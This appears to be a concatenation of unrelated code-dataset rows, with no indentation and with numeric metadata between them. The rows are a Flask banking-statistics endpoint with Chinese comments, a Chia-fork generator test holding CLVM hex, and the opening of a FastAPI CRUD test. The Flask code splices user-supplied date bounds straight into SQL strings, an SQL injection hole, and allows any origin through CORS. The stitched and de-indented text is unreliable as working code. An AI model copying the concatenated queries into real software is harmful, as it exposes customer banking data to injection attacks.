#如果这是 rawdata中没有的 一年
term = {}
term['time'] = str(result_deposit[i]['d_a_date1'].year)
term[result_deposit[i]['b_name2']] = []
term[result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_deposit[i]['b_name2']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
else:
if result_deposit[i]['customer_id2'] not in rawData[loc][result_deposit[i]['b_name2']]:
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#===============================以month为粒度=====================================================================
elif timegrain == 'month':#---
#-------check-----account-----
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_date0 AS c_a_date1,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID0,
CHECK_ACCOUNT_REGDATE AS C_A_date0
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID0 = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate_month(result_check[i]['c_a_date1'].year,result_check[i]['c_a_date1'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一月
term = {}
term['time'] = str(result_check[i]['c_a_date1'].year) + '.' + str(result_check[i]['c_a_date1'].month)
term[result_check[i]['b_name1']] = []
term[result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
#rawdata中有这一月 但是没有这条记录所在的支行 添加支行
rawData[loc][result_check[i]['b_name1']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
else:
if result_check[i]['customer_id1'] not in rawData[loc][result_check[i]['b_name1']]:
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.d_a_date0 AS d_a_date1,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id2
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID0,
DEPOSIT_ACCOUNT_REGDATE AS d_a_date0
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID0 = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#=============用户统计==存储业务===年为粒度===结果处理======
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate_month(result_deposit[i]['d_a_date1'].year, result_deposit[i]['d_a_date1'].month,rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
term['time'] = str(result_deposit[i]['d_a_date1'].year) + '.' + str(result_deposit[i]['d_a_date1'].month)
term[result_deposit[i]['b_name2']] = []
term[result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_deposit[i]['b_name2']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
else:
if result_deposit[i]['customer_id2'] not in rawData[loc][result_deposit[i]['b_name2']]:
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#===============================以season为粒度=====================================================================
elif timegrain == 'season':#---
#-------check-----account-----
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_date0 AS c_a_date1,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID0,
CHECK_ACCOUNT_REGDATE AS C_A_date0
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID0 = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate_season(result_check[i]['c_a_date1'].year,result_check[i]['c_a_date1'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一season
term = {}
s = math.ceil(result_check[i]['c_a_date1'].month/3)
term['time'] = str(result_check[i]['c_a_date1'].year) + '-' + str(s)
term[result_check[i]['b_name1']] = []
term[result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
#rawdata中有这一月 但是没有这条记录所在的支行 添加支行
rawData[loc][result_check[i]['b_name1']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
else:
if result_check[i]['customer_id1'] not in rawData[loc][result_check[i]['b_name1']]:
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.d_a_date0 AS d_a_date1,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id2
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID0,
DEPOSIT_ACCOUNT_REGDATE AS d_a_date0
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID0 = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#=============用户统计==存储业务===年为粒度===结果处理======
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate_season(result_deposit[i]['d_a_date1'].year, result_deposit[i]['d_a_date1'].month,rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
s = math.ceil(result_deposit[i]['d_a_date1'].month/3)
term['time'] = str(result_deposit[i]['d_a_date1'].year) + '-' + str(s)
term[result_deposit[i]['b_name2']] = []
term[result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_deposit[i]['b_name2']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
else:
if result_deposit[i]['customer_id2'] not in rawData[loc][result_deposit[i]['b_name2']]:
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#===================================贷款业务==================================================================
elif sumtype == 'loan':
#===============================以年为粒度=====================================================================
if timegrain == 'year':#---
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
LOAN.BANK_NAME AS b_name3,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id3,
NEW_PAY.pay_date0 AS pay_date3
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------用户统计----贷款业务-------结果处理---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['b_name3'] not in columnList:
columnList.append(result_loan[i]['b_name3'])
for i in range(len(result_loan)):
loc = locate(result_loan[i]['pay_date3'].year, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
term['time'] = str(result_loan[i]['pay_date3'].year)
term[result_loan[i]['b_name3']] = []
term[result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
rawData.append(term)
else:
if result_loan[i]['b_name3'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_loan[i]['b_name3']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
else:
if result_loan[i]['customer_id3'] not in rawData[loc][result_loan[i]['b_name3']]:
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#===============================以month为粒度=====================================================================
elif timegrain == 'month':#---
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
LOAN.BANK_NAME AS b_name3,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id3,
NEW_PAY.pay_date0 AS pay_date3
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------用户统计----贷款业务-------结果处理---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['b_name3'] not in columnList:
columnList.append(result_loan[i]['b_name3'])
for i in range(len(result_loan)):
loc = locate_month(result_loan[i]['pay_date3'].year,result_loan[i]['pay_date3'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
term['time'] = str(result_loan[i]['pay_date3'].year)+'.'+str(result_loan[i]['pay_date3'].month)
term[result_loan[i]['b_name3']] = []
term[result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
rawData.append(term)
else:
if result_loan[i]['b_name3'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_loan[i]['b_name3']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
else:
if result_loan[i]['customer_id3'] not in rawData[loc][result_loan[i]['b_name3']]:
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#===============================以season为粒度=====================================================================
elif timegrain == 'season':#---
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
LOAN.BANK_NAME AS b_name3,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id3,
NEW_PAY.pay_date0 AS pay_date3
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------用户统计----贷款业务-------结果处理---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['b_name3'] not in columnList:
columnList.append(result_loan[i]['b_name3'])
for i in range(len(result_loan)):
loc = locate_season(result_loan[i]['pay_date3'].year,result_loan[i]['pay_date3'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
s = math.ceil(result_loan[i]['pay_date3'].month/3)
term['time'] = str(result_loan[i]['pay_date3'].year)+'-' + str(s)
term[result_loan[i]['b_name3']] = []
term[result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
rawData.append(term)
else:
if result_loan[i]['b_name3'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_loan[i]['b_name3']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
else:
if result_loan[i]['customer_id3'] not in rawData[loc][result_loan[i]['b_name3']]:
rawData[loc][result_loan[i]['b_name3']].append(result_loan[i]['customer_id3'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#response = make_response(jsonify({
# 'code':200,
# 'columnList':['合肥支行','南京支行','上海支行','杭州支行','宁波支行'],
# 'rawData':[
# {'time':'2018','合肥支行':25,'南京支行':45,'上海支行':21,'杭州支行':41,'宁波支行':25},
# {'time':'2019','合肥支行':52,'南京支行':5,'上海支行':121,'杭州支行':52,'宁波支行':20},
# ]
# })
# )
| 49.597776
| 158
| 0.412351
| 10,483
| 129,351
| 4.796719
| 0.026328
| 0.042658
| 0.032018
| 0.060138
| 0.965715
| 0.944774
| 0.939921
| 0.93314
| 0.925642
| 0.918403
| 0
| 0.013217
| 0.477685
| 129,351
| 2,607
| 159
| 49.616801
| 0.730914
| 0.085434
| 0
| 0.823018
| 0
| 0
| 0.319017
| 0.080413
| 0
| 0
| 0
| 0.000384
| 0
| 1
| 0.003257
| false
| 0
| 0.008686
| 0.000543
| 0.035831
| 0.046688
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
92dff9b06bd13c4f727be4df42ef9580193cceb5
| 4,250
|
py
|
Python
|
tests/generator/test_generator_types.py
|
grayfallstown/covid-blockchain
|
194d5351c70d3ee5d928f767e21c7894cfbb59a7
|
[
"Apache-2.0"
] | 14
|
2021-07-28T09:56:07.000Z
|
2022-02-09T04:28:14.000Z
|
tests/generator/test_generator_types.py
|
grayfallstown/covid-blockchain
|
194d5351c70d3ee5d928f767e21c7894cfbb59a7
|
[
"Apache-2.0"
] | 23
|
2021-07-28T10:16:56.000Z
|
2022-03-26T10:43:53.000Z
|
tests/generator/test_generator_types.py
|
grayfallstown/covid-blockchain
|
194d5351c70d3ee5d928f767e21c7894cfbb59a7
|
[
"Apache-2.0"
] | 9
|
2021-07-28T02:41:24.000Z
|
2022-03-15T08:32:49.000Z
|
from typing import Dict
from unittest import TestCase
from covid.types.blockchain_format.program import Program, SerializedProgram
from covid.types.generator_types import GeneratorBlockCacheInterface
from covid.full_node.generator import create_block_generator, create_generator_args
from covid.util.ints import uint32
gen0 = SerializedProgram.from_bytes(
bytes.fromhex(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080" # noqa
)
)
gen1 = SerializedProgram.from_bytes(
bytes.fromhex(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080" # noqa
)
)
gen2 = SerializedProgram.from_bytes(
bytes.fromhex(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080" # noqa
)
)
class BlockDict(GeneratorBlockCacheInterface):
def __init__(self, d: Dict[uint32, SerializedProgram]):
self.d = d
def get_generator_for_block_height(self, index: uint32) -> SerializedProgram:
return self.d[index]
class TestGeneratorTypes(TestCase):
def test_make_generator(self):
block_dict = BlockDict({uint32(1): gen1})
gen = create_block_generator(gen2, [uint32(1)], block_dict)
print(gen)
def test_make_generator_args(self):
generator_ref_list = [gen1]
gen_args = create_generator_args(generator_ref_list)
gen_args_as_program = Program.from_bytes(bytes(gen_args))
# First Argument to the block generator is the first template generator
arg2 = gen_args_as_program.first().first()
print(arg2)
assert arg2 == bytes(gen1)
# It's not a list anymore.
# TODO: Test the first three arg positions passed through here.
# def test_generator_arg_is_list(self):
# generator_ref_list = [Program.to(b"gen1"), Program.to(b"gen2")]
# gen_args = create_generator_args(generator_ref_list)
# gen_args_as_program = Program.from_bytes(bytes(gen_args))
# arg2 = gen_args_as_program.rest().first()
# assert arg2 == binutils.assemble("('gen1' 'gen2')")
# print(arg2)
| 69.672131
| 804
| 0.866118
| 237
| 4,250
| 15.274262
| 0.308017
| 0.01547
| 0.019337
| 0.01768
| 0.744751
| 0.733702
| 0.733702
| 0.047514
| 0.047514
| 0.047514
| 0
| 0.343264
| 0.091765
| 4,250
| 60
| 805
| 70.833333
| 0.59456
| 0.119529
| 0
| 0.157895
| 0
| 0
| 0.632511
| 0.632511
| 0
| 1
| 0
| 0.016667
| 0.026316
| 1
| 0.105263
| false
| 0
| 0.157895
| 0.026316
| 0.342105
| 0.052632
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
135e068202aa307c1a7095066d694be6c97c2d4e
| 19,782
|
py
|
Python
|
tests/test_implementations/test_sqlalchemy/api_test/test_delete_many_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 123
|
2021-08-17T01:54:12.000Z
|
2022-03-29T20:41:56.000Z
|
tests/test_implementations/test_sqlalchemy/api_test/test_delete_many_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 10
|
2021-12-28T21:34:20.000Z
|
2022-03-16T13:31:24.000Z
|
tests/test_implementations/test_sqlalchemy/api_test/test_delete_many_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 10
|
2021-08-17T07:37:36.000Z
|
2022-03-31T13:16:55.000Z
|
import json
from collections import OrderedDict
from starlette.testclient import TestClient
from src.fastapi_quickcrud import sqlalchemy_to_pydantic
from src.fastapi_quickcrud.crud_router import crud_router_builder
from src.fastapi_quickcrud.misc.type import CrudMethods
from tests.test_implementations.test_sqlalchemy.api_test import get_transaction_session, app, UntitledTable256
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.UPSERT_ONE
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_create_one = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_creation_one",
tags=["test"]
)
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.UPSERT_MANY,
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
